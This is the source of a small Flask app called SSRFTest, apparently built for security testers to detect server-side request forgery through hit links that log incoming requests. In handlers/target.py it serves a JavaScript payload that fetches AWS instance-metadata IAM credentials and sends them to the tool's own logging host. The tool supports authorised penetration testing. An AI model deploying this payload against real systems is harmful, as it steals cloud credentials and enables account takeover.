├── handlers
├── __init__.py
├── index.py
├── dashboard.py
├── auth.py
└── target.py
├── prestart.sh
├── run-debug.sh
├── static
└── favicon.png
├── templates
├── index.html
├── dashboard
│ ├── index.html
│ └── newTarget.html
├── auth
│ ├── login.html
│ └── register.html
├── target
│ └── index.html
└── base.html
├── dbrepl.py
├── Dockerfile
├── uwsgi.ini
├── requirements.txt
├── docker-compose.yml
├── readme.md
├── license.txt
├── model.py
├── main.py
├── handler.py
└── metamodel.py
/handlers/__init__.py:
--------------------------------------------------------------------------------
1 | import index, auth, dashboard, target
2 |
--------------------------------------------------------------------------------
/prestart.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | sysctl -w net.core.somaxconn=65536
4 |
--------------------------------------------------------------------------------
/run-debug.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | FLASK_ENV=development python main.py
--------------------------------------------------------------------------------
/static/favicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/daeken/SSRFTest/HEAD/static/favicon.png
--------------------------------------------------------------------------------
/templates/index.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block scripts %}
3 | {% endblock %}
4 | {% block body %}
5 |
SSRFTest
6 | Blah blah blah
7 | {% endblock %}
8 |
--------------------------------------------------------------------------------
/dbrepl.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python -i
2 | from metamodel import createLocalSession
3 | from main import app
4 | app.test_request_context('/').__enter__()
5 | createLocalSession()
6 | from model import *
7 |
--------------------------------------------------------------------------------
/handlers/index.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 |
3 | @handler('index', authed=False)
4 | def get_index():
5 | if session.user is not None:
6 | redirect(handler.dashboard.get_index)
7 | return dict(page='home')
8 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM tiangolo/uwsgi-nginx-flask:python2.7
2 |
3 | WORKDIR /app
4 |
5 | ADD requirements.txt /app/
6 |
7 | RUN pip install --trusted-host pypi.python.org -r requirements.txt
8 |
9 | ADD . /app
10 |
--------------------------------------------------------------------------------
/uwsgi.ini:
--------------------------------------------------------------------------------
1 | [uwsgi]
2 | module = main
3 | callable = app
4 | listen = 16384
5 | lazy-apps = true
6 | master = true
7 | processes = 100
8 | max-requests = 1000
9 | logto = /var/log/uwsgi.log
10 | harakiri = 45
11 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | bcrypt==3.1.4
2 | certifi==2018.4.16
3 | cffi==1.11.5
4 | chardet==3.0.4
5 | click==6.7
6 | Flask==1.0.2
7 | idna==2.7
8 | itsdangerous==0.24
9 | Jinja2==2.10
10 | MarkupSafe==1.0
11 | pycparser==2.18
12 | six==1.11.0
13 | SQLAlchemy==1.2.10
14 | urllib3==1.23
15 | Werkzeug==0.14.1
16 | psycopg2
17 | flask-cors
18 |
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.1'
2 |
3 | services:
4 | db:
5 | image: postgres
6 | restart: always
7 | environment:
8 | POSTGRES_PASSWORD: dbpassword
9 | volumes:
10 | - db-data:/var/lib/postgresql/data
11 |
12 | web:
13 | privileged: true
14 | image: ssrfweb
15 | restart: always
16 | ports:
17 | - 80:80
18 |
19 | volumes:
20 | db-data:
21 |
--------------------------------------------------------------------------------
/templates/dashboard/index.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | New Target
4 | {% if len(targets) %}
5 |
6 |
7 | Name Last Hit
8 |
9 |
10 | {% for (link, name, lastHit) in targets %}
11 | {{ name }} {{ lastHit }}
12 | {% endfor %}
13 |
14 |
15 | {% endif %}
16 | {% endblock %}
--------------------------------------------------------------------------------
/templates/dashboard/newTarget.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {% if error %}
4 | {{ error }}
5 | {% endif %}
6 | New Target
7 |
16 | {% endblock %}
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | Welcome to SSRFTest
2 | ===================
3 |
4 | Installation
5 | ------------
6 |
7 | 1. Clone the repo
8 | 2. Generate a random 64-byte ASCII string (I typically just run `import random; ''.join('%02x' % random.randrange(256) for i in xrange(32))` at the Python interpreter)
9 | 3. Put that string into main.py on the line `app.secret_key = key = 'SECRET HERE'`
10 | 4. (Optional) Change the database password in docker-compose.yml and model.py -- default is `dbpassword`. This is not exposed to the outside so it's largely irrelevant
11 | 5. Search for `ssrftest.com` and replace it with the IP/domain you're hosting this on
12 | 6. Install Docker and Docker Compose
13 | 7. Run `./build-docker.sh`
14 | 8. Run `docker-compose up`
15 | 9. ???
16 | 10. Profit
17 |
--------------------------------------------------------------------------------
/templates/auth/login.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {% if error %}
4 | {{ error }}
5 | {% endif %}
6 |
24 | {% endblock %}
--------------------------------------------------------------------------------
/license.txt:
--------------------------------------------------------------------------------
1 | Copyright 2019 Cody Brocious
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
4 |
5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
6 |
7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/handlers/dashboard.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 |
3 | errors = [
4 | 'Target name required',
5 | 'You have a target with this name already'
6 | ]
7 |
8 | linkchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'
9 |
10 | @handler('dashboard/index')
11 | def get_index():
12 | return dict(page='home', targets=[
13 | (target.link, target.name, sorted(hit.at for hit in target.hits)[-1] if len(target.hits) else None)
14 | for target in session.user.targets
15 | ])
16 |
17 | @handler('dashboard/newTarget')
18 | def get_newTarget(error=None):
19 | return dict(error=errors[int(error)] if error is not None else None)
20 |
21 | @handler
22 | def post_newTarget(name):
23 | if name is None or name.strip() == '':
24 | redirect(get_newTarget.url(error=0))
25 | elif Target.one(user_id=session.user.id, name=name):
26 | redirect(get_newTarget.url(error=1))
27 | while True:
28 | link = ''.join(linkchars[random.randrange(len(linkchars))] for i in xrange(5))
29 | if Target.one(link=link) is None:
30 | break
31 | Target.add(session.user, link, name)
32 | redirect(handler.target.get_index.url(link=link))
33 |
--------------------------------------------------------------------------------
/templates/target/index.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {{ name }}
4 | Hit Link:
5 | IFrame:
6 | Script:
7 | Image:
8 | {% if len(logs) %}
9 | Log Messages
10 |
11 |
12 | Date Message
13 |
14 |
15 | {% for (at, message) in logs %}
16 | {{ at }} {{ message }}
17 | {% endfor %}
18 |
19 |
20 | {% endif %}
21 | {% if len(hits) %}
22 | Hits
23 |
24 |
25 | Date Request
26 |
27 |
28 | {% for (at, req) in hits %}
29 | {{ at }} {{ req }}
30 | {% endfor %}
31 |
32 |
33 | {% endif %}
34 | {% endblock %}
35 |
--------------------------------------------------------------------------------
/templates/auth/register.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {% if error %}
4 | {{ error }}
5 | {% endif %}
6 |
36 | {% endblock %}
37 |
--------------------------------------------------------------------------------
/handlers/auth.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 | import bcrypt, random
3 |
4 | errors = [
5 | 'You must be logged in to view that page',
6 | 'Username or email in use',
7 | 'Password too short',
8 | 'Passwords do not match',
9 | 'Invalid username or password'
10 | ]
11 |
12 | @handler('auth/login', authed=False)
13 | def get_index(error=None):
14 | if session.user is not None:
15 | redirect(handler.index.get_index)
16 | return dict(page='login', error=errors[int(error)] if error is not None else None)
17 |
18 | @handler(authed=False)
19 | def get_logout():
20 | del session['userId']
21 | redirect('/')
22 |
23 | @handler('auth/register', authed=False)
24 | def get_register(error=None):
25 | if session.user is not None:
26 | redirect(handler.index.get_index)
27 | return dict(page='register', error=errors[int(error)] if error is not None else None)
28 |
29 | @handler(authed=False)
30 | def post_register(username, password, password2, email):
31 | if session.user is not None:
32 | redirect(handler.index.get_index)
33 | if User.one(username=username) or User.one(email=email):
34 | redirect(get_register.url(error=1))
35 | elif len(password) < 8:
36 | redirect(get_register.url(error=2))
37 | elif password != password2:
38 | redirect(get_register.url(error=3))
39 |
40 | user = User.add(username, password, email, False)
41 | session['userId'] = user.id
42 | redirect(handler.index.get_index)
43 |
44 | @handler(authed=False, CSRFable=True)
45 | def post_login(username, password):
46 | if session.user is not None:
47 | redirect(handler.index.get_index)
48 | user = User.find(username, password)
49 |
50 | if user == None:
51 | redirect(get_index.url(error=4))
52 | else:
53 | session['userId'] = user.id
54 |
55 | redirect(handler.index.get_index)
56 |
--------------------------------------------------------------------------------
/handlers/target.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 |
3 | @handler('target/index')
4 | def get_index(link):
5 | if link is None:
6 | return 'Fail'
7 | target = Target.one(user_id=session.user.id, link=link)
8 | if target is None:
9 | return 'Unknown link'
10 | return dict(
11 | name=target.name,
12 | logs=[(log.at, log.message) for log in target.logs[::-1]],
13 | hits=[(hit.at, hit.request) for hit in target.hits[::-1]]
14 | )
15 |
16 | js = '''function log(data) {
17 | var sreq = new XMLHttpRequest();
18 | sreq.open('GET', 'http://ssrftest.com/target/log?link=LINK&data=' + encodeURI(data), true);
19 | sreq.send();
20 | }
21 |
22 | function get(url) {
23 | try {
24 | var req = new XMLHttpRequest();
25 | req.open('GET', url, false);
26 | req.send(null);
27 | if(req.status == 200)
28 | return req.responseText;
29 | } catch(err) {
30 | }
31 | return null;
32 | }
33 |
34 | log('Triggered in ' + window.location.href);
35 | var role = get('http://169.254.169.254/latest/meta-data/iam/security-credentials/');
36 | if(role !== null) {
37 | log('Fetched AWS role: ' + role);
38 | log('With AWS credentials: ' + get('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role));
39 | } else
40 | log('Failed to get AWS role');
41 | '''
42 |
43 | def hit(link, ext, req):
44 | if link is None:
45 | return 'Fail'
46 | target = Target.one(link=link)
47 | if target is None:
48 | return 'Unknown link'
49 | Hit.add(target, req)
50 |
51 | if ext == 'js':
52 | return Response(js.replace('LINK', link), mimetype='application/javascript')
53 | return Response('' % link, mimetype='text/html')
54 |
55 | @handler(authed=False)
56 | def get_log(link, data):
57 | if link is None:
58 | return 'Fail'
59 | target = Target.one(link=link)
60 | if target is None:
61 | return 'Unknown link'
62 | Log.add(target, data)
63 | return ''
64 |
--------------------------------------------------------------------------------
/templates/base.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SSRFTest
6 |
7 |
8 |
9 | {% block scripts %}
10 | {% endblock %}
11 |
12 |
13 |
14 |
15 | SSRFTest
16 |
17 |
18 | Home
19 |
20 | {% if session.user == None %}
21 |
22 | Sign Up
23 |
24 |
25 | Log In
26 |
27 | {% else %}
28 |
29 | Log Out
30 |
31 | {% endif %}
32 |
33 |
34 |
35 |
36 |
37 | {% block body %}
38 | {% endblock %}
39 |
40 |
41 |
42 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
--------------------------------------------------------------------------------
/model.py:
--------------------------------------------------------------------------------
1 | import math, hashlib, json, os, random
2 | from datetime import datetime, timedelta
3 | import sqlalchemy as sa
4 | from sqlalchemy.orm import relationship
5 | from sqlalchemy.types import *
6 | from metamodel import *
7 | import bcrypt
8 |
9 | @Model
10 | def Log():
11 | target_id = ForeignKey(Integer, 'Target.id')
12 | message = Unicode(65536)
13 | at = DateTime
14 |
15 | @staticmethod
16 | def add(target, data):
17 | with transact:
18 | return Log.create(
19 | target_id=target.id,
20 | message=data,
21 | at=datetime.now()
22 | )
23 |
24 | @Model
25 | def Hit():
26 | target_id = ForeignKey(Integer, 'Target.id')
27 | request = Unicode(65536)
28 | at = DateTime
29 |
30 | @staticmethod
31 | def add(target, request):
32 | with transact:
33 | return Hit.create(
34 | target_id=target.id,
35 | request=request,
36 | at=datetime.now()
37 | )
38 |
39 | @Model
40 | def Target():
41 | user_id = ForeignKey(Integer, 'User.id')
42 | enabled = Boolean
43 | link = String(5)
44 | name = Unicode
45 |
46 | logs = Log.relation(backref='target')
47 | hits = Hit.relation(backref='target')
48 |
49 | @staticmethod
50 | def add(user, link, name):
51 | with transact:
52 | return Target.create(
53 | enabled=True,
54 | user_id=user.id,
55 | link=link,
56 | name=name
57 | )
58 |
59 | @Model
60 | def User():
61 | enabled = Boolean
62 | admin = Boolean
63 | username = Unicode(255)
64 | password = String(88)
65 | email = String
66 | registrationDate = DateTime
67 |
68 | targets = Target.relation(backref='user')
69 |
70 | def setPassword(self, password):
71 | with transact:
72 | self.password = User.hash(password)
73 |
74 | @staticmethod
75 | def hash(password):
76 | return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(12))
77 |
78 | @staticmethod
79 | def checkHash(hash, password):
80 | try:
81 | hash = hash.encode('utf-8')
82 | return bcrypt.hashpw(password.encode('utf-8'), hash) == hash
83 | except:
84 | return False
85 |
86 | @staticmethod
87 | def add(username, password, email, admin):
88 | if User.one(enabled=True, username=username) or User.one(enabled=True, email=email):
89 | return None
90 | with transact:
91 | return User.create(
92 | enabled=True,
93 | username=username,
94 | password=User.hash(password),
95 | email=email,
96 | admin=admin,
97 | registrationDate=datetime.now()
98 | )
99 |
100 | @staticmethod
101 | def find(username, password):
102 | if username == None or password == None:
103 | return None
104 | user = User.one(enabled=True, username=username)
105 | if user and User.checkHash(user.password, password):
106 | return user
107 | if not user and len(User.all()) == 0:
108 | return User.add(username, password, 'admin@admin', True)
109 | return None
110 |
111 | db = 'postgresql://postgres:dbpassword@db/postgres'
112 |
113 | @setup(db)
114 | def init():
115 | pass
116 |
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | import os
2 | from flask import Flask, request
3 | from flask_cors import CORS
4 | from werkzeug.routing import Rule
5 | import handler
6 | import handlers
7 | from handlers import *
8 | from metamodel import createLocalSession, closeLocalSession
9 |
10 | app = Flask(__name__)
11 | CORS(app, resources={r'/x/*': {'origins' : '*'}, r'/target/log': {'origins' : '*'}})
12 | app.debug = True
13 | app.secret_key = key = 'SECRET HERE'
14 | app.config.update(
15 | SESSION_COOKIE_NAME='__Host-session',
16 | SESSION_COOKIE_SECURE=True,
17 | SESSION_COOKIE_HTTPONLY=True,
18 | SESSION_COOKIE_SAMESITE='Lax'
19 | )
20 |
21 | @app.teardown_request
22 | def session_clear(exception=None):
23 | if not hasattr(request, '_session'):
24 | return
25 | request._session.remove()
26 | if exception and request._session.is_active:
27 | request._session.rollback()
28 |
29 | def reroute(noId, withId):
30 | def sub(id=None, *args, **kwargs):
31 | try:
32 | if id == None:
33 | return noId(*args, **kwargs)
34 | else:
35 | return withId(id, *args, **kwargs)
36 | except:
37 | import traceback
38 | traceback.print_exc()
39 | sub.func_name = '__reroute_' + noId.func_name
40 | return sub
41 |
42 | for module, sub in handler.all.items():
43 | for name, (method, args, rpc, (noId, withId)) in sub.items():
44 | if module == 'index':
45 | route = '/'
46 | trailing = True
47 | else:
48 | route = '/%s' % module
49 | trailing = False
50 | if name != 'index':
51 | if not trailing:
52 | route += '/'
53 | route += '%s' % name
54 | trailing = False
55 |
56 | if noId != None and withId != None:
57 | func = reroute(noId, withId)
58 | elif noId != None:
59 | func = noId
60 | else:
61 | func = withId
62 |
63 | if withId != None:
64 | iroute = route
65 | if not trailing:
66 | iroute += '/'
67 | iroute += ''
68 | app.route(iroute, methods=[method])(func)
69 |
70 | if noId != None:
71 | app.route(route, methods=[method])(func)
72 |
73 | @app.route('/favicon.ico')
74 | def favicon():
75 | return app.send_static_file('favicon.png')
76 | @app.route('/css/')
77 | @app.route('/fonts/')
78 | @app.route('/img/')
79 | @app.route('/js/')
80 | @app.route('/js//')
81 | def staticfiles(fn, dir=None):
82 | if '..' in fn or (dir is not None and '..' in dir):
83 | return 'There is only one god and his name is Directory Traversal. And there is only one thing we say to Directory Traversal: "Not today."'
84 | return app.send_static_file(request.path[1:])
85 |
86 | rpcStubTemplate = '''%s: function(%s, callback) {
87 | $.ajax(%r,
88 | {
89 | success: function(data) {
90 | if(callback !== undefined)
91 | callback(data)
92 | },
93 | error: function() {
94 | if(callback !== undefined)
95 | callback()
96 | },
97 | dataType: 'json',
98 | data: {csrf: $csrf, %s},
99 | type: 'POST'
100 | }
101 | )
102 | }'''
103 | cachedRpc = None
104 | @app.route('/rpc.js')
105 | def rpc():
106 | global cachedRpc
107 | if cachedRpc:
108 | return cachedRpc
109 |
110 | modules = []
111 | for module, sub in handler.all.items():
112 | module = [module]
113 | for name, (method, args, rpc, funcs) in sub.items():
114 | if not rpc:
115 | continue
116 | func = funcs[0] if funcs[0] else funcs[1]
117 | name = name[4:]
118 | method = rpcStubTemplate % (
119 | name, ', '.join(args),
120 | func.url(),
121 | ', '.join('%s: %s' % (arg, arg) for arg in args)
122 | )
123 | module.append(method)
124 | if len(module) > 1:
125 | modules.append(module)
126 |
127 | cachedRpc = 'var $rpc = {%s};' % (', '.join('%s: {%s}' % (module[0], ', '.join(module[1:])) for module in modules))
128 | return cachedRpc
129 |
130 | @app.route('/scripts/')
131 | def script(fn):
132 | try:
133 | if not fn.endswith('.js'):
134 | return ''
135 |
136 | fn = 'scripts/' + fn[:-3]
137 | if os.path.exists(fn + '.js'):
138 | return file(fn + '.js', 'rb').read()
139 | return ''
140 | except:
141 | import traceback
142 | traceback.print_exc()
143 |
144 | app.url_map.add(Rule('/x/ ', endpoint='hit'))
145 |
146 | @app.endpoint('hit')
147 | def hit(link):
148 | if '.' in link:
149 | link, ext = link.split('.', 1)
150 | else:
151 | ext = ''
152 |
153 | req = '%s %s HTTP/1.1\r\n' % (request.method, request.url)
154 | for k, v in request.headers:
155 | req += '%s: %s\r\n' % (k, v)
156 | req += '\r\n'
157 | req += request.get_data()
158 |
159 | createLocalSession()
160 | try:
161 | ret = handlers.target.hit(link, ext, req)
162 | except:
163 | closeLocalSession(True)
164 | raise
165 | else:
166 | closeLocalSession(False)
167 | return ret
168 |
169 | if __name__=='__main__':
170 | app.run(host='')
171 |
--------------------------------------------------------------------------------
/handler.py:
--------------------------------------------------------------------------------
1 | import os
2 | from json import dumps
3 | from flask import abort, make_response, render_template, request, session, Response
4 | from flask import redirect as _redirect
5 | from werkzeug.exceptions import HTTPException
6 | from urllib import quote, urlencode
7 | from datetime import datetime, timedelta
8 | from metamodel import createLocalSession, closeLocalSession
9 | from model import *
10 |
11 | class DictObject(dict):
12 | pass
13 |
14 | class StrObject(str):
15 | pass
16 |
17 | all = {}
18 |
19 | def handler(_tpl=None, _json=False, CSRFable=False, authed=True, admin=False):
20 | def sub(func):
21 | ofunc = func
22 | while hasattr(func, '__delegated__'):
23 | func = func.__delegated__
24 | sofunc = func
25 |
26 | name = func.func_name
27 | rpc = False
28 | stpl = _tpl
29 | json = _json
30 | if name.startswith('get_'):
31 | name = name[4:]
32 | method = 'GET'
33 | elif name.startswith('post_'):
34 | method = 'POST'
35 | elif name.startswith('rpc_'):
36 | method = 'POST'
37 | rpc = json = True
38 | stpl = None
39 | else:
40 | raise Exception('All handlers must be marked get_, post_, or rpc_.')
41 |
42 | module = func.__module__.split('.')[-1]
43 | if not module in all:
44 | all[module] = DictObject()
45 | setattr(handler, module, all[module])
46 | args = func.__code__.co_varnames[:func.__code__.co_argcount]
47 | hasId = len(args) > 0 and args[0] == 'id' and not rpc
48 |
49 | def func(id=None):
50 | createLocalSession()
51 | try:
52 | tpl = stpl
53 | if 'csrf' not in session:
54 | token = os.urandom(16)
55 | session['csrf'] = ''.join('%02x' % ord(c) for c in token)
56 | if not CSRFable and method == 'POST' and \
57 | ('csrf' not in request.form or request.form['csrf'] != session['csrf']):
58 | abort(403)
59 | if 'userId' in session and session['userId']:
60 | session.user = User.one(id=int(session['userId']))
61 | else:
62 | session.user = None
63 | if admin and (session.user == None or not session.user.admin):
64 | return abort(404)
65 | elif authed and session.user == None:
66 | return _redirect(handler.auth.get_index.url(error=0))
67 | params = request.form if method == 'POST' else request.args
68 | kwargs = {}
69 | for i, arg in enumerate(args):
70 | if i == 0 and arg == 'id' and not rpc:
71 | continue
72 | if arg in params:
73 | kwargs[arg] = params[arg]
74 | elif arg in request.files:
75 | kwargs[arg] = request.files[arg]
76 | else:
77 | assert not rpc # RPC requires all arguments.
78 |
79 | try:
80 | if hasId and id != None:
81 | ret = ofunc(int(id), **kwargs)
82 | else:
83 | ret = ofunc(**kwargs)
84 | except RedirectException, r:
85 | return _redirect(r.url)
86 | except TemplateException, t:
87 | tpl = t.tpl
88 | ret = t.args
89 | if json:
90 | ret = dumps(ret)
91 | elif tpl != None:
92 | if isinstance(ret, str) or isinstance(ret, unicode):
93 | return ret
94 | if ret == None:
95 | ret = {}
96 | sret = ret
97 | ret = kwargs
98 | ret['handler'] = handler
99 | ret['request'] = request
100 | ret['session'] = session
101 | ret['len'] = len
102 | ret['int'] = int
103 | ret['float'] = float
104 | ret.update(sret)
105 | ret = render_template(tpl + '.html', **ret)
106 | csrf = ' ' % session['csrf']
107 | ret = ret.replace('$CSRF$', csrf)
108 |
109 | ret = make_response(ret, 200)
110 | if hasattr(request, '_headers'):
111 | for k, v in request._headers.items():
112 | ret.headers[k] = v
113 | ret.headers['X-Frame-Options'] = 'sameorigin'
114 | except:
115 | closeLocalSession(True)
116 | raise
117 | else:
118 | closeLocalSession(False)
119 | return ret
120 |
121 | func.func_name = '__%s__%s__' % (module, name)
122 |
123 | def url(_id=None, **kwargs):
124 | if module == 'index':
125 | url = '/'
126 | trailing = True
127 | else:
128 | url = '/%s' % module
129 | trailing = False
130 | if name != 'index':
131 | if not trailing:
132 | url += '/'
133 | url += '%s' % name
134 | trailing = False
135 | if _id != None:
136 | if not trailing:
137 | url += '/'
138 | url += quote(str(_id))
139 | if len(kwargs):
140 | url += '?'
141 | url += urlencode(dict((k, str(v)) for k, v in kwargs.items()))
142 | return url
143 |
144 | ustr = StrObject(url())
145 | ustr.__call__ = ofunc
146 | ustr.url = url
147 | func.url = url
148 | if not name in all[module]:
149 | all[module][name] = method, args, rpc, [None, None]
150 | if hasId and not rpc:
151 | all[module][name][3][1] = func
152 | else:
153 | all[module][name][3][0] = func
154 | setattr(all[module], sofunc.func_name, ustr)
155 | return ustr
156 |
157 | if _tpl != None and hasattr(_tpl, '__call__'):
158 | func = _tpl
159 | _tpl = None
160 | return sub(func)
161 | return sub
162 |
163 | def sessid():
164 | if 'sessid' not in session:
165 | token = os.urandom(8)
166 | session['sessid'] = ''.join('%02x' % ord(c) for c in token)
167 | return session['sessid']
168 | handler.sessid = sessid
169 |
170 | def header(key, value):
171 | if not hasattr(request, '_headers'):
172 | request._headers = {}
173 |
174 | request._headers[key] = value
175 | handler.header = header
176 |
177 | class RedirectException(Exception):
178 | def __init__(self, url):
179 | self.url = url
180 |
181 | def redirect(url, _id=None, **kwargs):
182 | if hasattr(url, '__call__') and hasattr(url, 'url'):
183 | url = url.url(_id, **kwargs)
184 | print 'Redirecting to', url
185 | raise RedirectException(url)
186 |
187 | class TemplateException(Exception):
188 | def __init__(self, tpl, args):
189 | self.tpl, self.args = tpl, args
190 |
191 | def templatize(tpl, **args):
192 | raise TemplateException(tpl, args)
193 |
--------------------------------------------------------------------------------
/metamodel.py:
--------------------------------------------------------------------------------
1 | import sqlalchemy as sa
2 | from sqlalchemy import orm
3 | from sqlalchemy.types import Integer
4 | from sqlalchemy.sql.type_api import TypeEngine
5 | from sqlalchemy.orm import scoped_session, sessionmaker
6 | from sqlalchemy.orm.attributes import QueryableAttribute
7 | from flask import request
8 | import sys
9 |
10 | class SessionProxy(object):
11 | def __getattr__(self, name):
12 | return getattr(request._session, name)
13 |
14 | def __enter__(self):
15 | if not hasattr(request, '_inTransact'):
16 | request._inTransact = 0
17 | request._inTransact += 1
18 |
19 | def __exit__(self, type, value, traceback):
20 | request._inTransact -= 1
21 | if request._inTransact > 0:
22 | if type != None:
23 | raise
24 | return
25 | if type == None:
26 | try:
27 | request._session.commit()
28 | except:
29 | request._session.rollback()
30 | raise
31 | else:
32 | request._session.rollback()
33 | raise
34 |
35 | def createLocalSession():
36 | request._session = scoped_session(sessionmaker())
37 | request._session.configure(bind=engine)
38 |
39 | def closeLocalSession(didExcept):
40 | request._session.remove()
41 | if didExcept and request._session.is_active:
42 | request._session.rollback()
43 |
44 | transact = SessionProxy()
45 | metadata = sa.MetaData()
46 |
47 | # Monkey patched into Model-decorated classes
48 | @classmethod
49 | def relation(cls, *args, **kwargs):
50 | return orm.relation(cls, *args, **kwargs)
51 |
52 |
53 | @classmethod
54 | def create(cls, **kwargs):
55 | with transact:
56 | obj = cls()
57 | for k, v in kwargs.items():
58 | setattr(obj, k, v)
59 | transact.add(obj)
60 | return obj
61 |
62 |
63 | def update(self, **kwargs):
64 | for k, v in kwargs.items():
65 | setattr(self, k, v)
66 | return self
67 |
68 |
69 | @classmethod
70 | def all(cls):
71 | retry = 10
72 | while retry:
73 | try:
74 | with transact:
75 | return transact.query(cls).all()
76 | except:
77 | retry -= 1
78 |
79 |
80 | def genFilter(cls, kwargs):
81 | if len(kwargs) == 1:
82 | k, v = kwargs.items()[0]
83 | return getattr(cls, k) == v
84 |
85 | filters = []
86 | for k, v in kwargs.items():
87 | filters.append(getattr(cls, k) == v)
88 | return sa.and_(*filters)
89 |
90 |
91 | @classmethod
92 | def some(cls, **kwargs):
93 | retry = 10
94 | while retry:
95 | try:
96 | with transact:
97 | filter = genFilter(cls, kwargs)
98 | return transact.query(cls).filter(filter).all()
99 | except:
100 | retry -= 1
101 |
102 | @classmethod
103 | def one(cls, **kwargs):
104 | retry = 10
105 | while retry:
106 | try:
107 | with transact:
108 | filter = genFilter(cls, kwargs)
109 | return transact.query(cls).filter(filter).one()
110 | except:
111 | retry -= 1
112 |
113 |
114 | def Model(func):
115 | cframe = [None]
116 | def trace(frame, event, arg):
117 | if cframe[0] is None:
118 | cframe[0] = frame
119 | sys.settrace(trace)
120 | func()
121 | sys.settrace(None)
122 |
123 | frame = cframe[0]
124 | names = list(func.func_code.co_varnames)
125 | elems = {name : frame.f_locals[name] for name in names}
126 |
127 | cls = type(func.__name__, (object, ), elems)
128 | cls._fields = names
129 | cls.create = create
130 | cls.update = update
131 | cls.all = all
132 | cls.some = some
133 | cls.one = one
134 | cls.relation = relation
135 | Model.classes.append(cls)
136 | return cls
137 | Model.classes = []
138 |
139 | engine = None
140 |
141 |
142 | def setup(db):
143 | global engine
144 | engine = sa.create_engine(db, client_encoding='utf8')
145 | metadata.bind = engine
146 |
147 | initialized = False
148 |
149 | for model in Model.classes:
150 | name = model.__name__
151 | params = []
152 | for field in dir(model):
153 | value = getattr(model, field)
154 | if isinstance(value, PrimaryKey):
155 | params = [field] + params
156 | else:
157 | params.append(field)
158 |
159 | columns = []
160 | columns.append(sa.Column('id', Integer, primary_key=True))
161 | relations = {}
162 | for field in params:
163 | value = getattr(model, field)
164 | if isinstance(value, Modifier):
165 | columns.append(value.build(field))
166 | delattr(model, field)
167 | elif (isinstance(value, type) or isinstance(value, TypeEngine)) and field != '__class__':
168 | columns.append(sa.Column(field, value))
169 | delattr(model, field)
170 | elif isinstance(value, orm.properties.RelationshipProperty):
171 | relations[field] = value
172 | delattr(model, field)
173 | elif field in model._fields:
174 | model._fields.remove(field)
175 |
176 | table = sa.Table(name, metadata, *columns)
177 | orm.mapper(model, table, properties=relations)
178 | if table.exists():
179 | initialized = True
180 |
181 | metadata.create_all()
182 |
183 | def sub(func):
184 | if not initialized:
185 | func()
186 |
187 | return sub
188 |
189 |
190 | class Modifier(object):
191 | pass
192 |
193 |
194 | class PrimaryKey(Modifier):
195 | def __init__(self, type):
196 | self.type = type
197 |
198 | def build(self, name):
199 | return sa.Column(name, self.type, primary_key=True)
200 |
201 |
202 | class ForeignKey(Modifier):
203 | def __init__(self, type, ref, *args, **kwargs):
204 | self.type, self.ref = type, ref
205 | self.args, self.kwargs = args, kwargs
206 |
207 | def build(self, name):
208 | return sa.Column(name, self.type, sa.ForeignKey(self.ref), *self.args, **self.kwargs)
209 |
210 |
211 | class Nullable(Modifier):
212 | def __init__(self, type, *args, **kwargs):
213 | self.type = type
214 | self.args, self.kwargs = args, kwargs
215 |
216 | def build(self, name):
217 | return sa.Column(name, self.type, nullable=True, *self.args, **self.kwargs)
218 |
219 |
220 | class Unique(Modifier):
221 | def __init__(self, type, *args, **kwargs):
222 | self.type = type
223 | self.args, self.kwargs = args, kwargs
224 |
225 | def build(self, name):
226 | return sa.Column(name, self.type, unique=True, *self.args, **self.kwargs)
--------------------------------------------------------------------------------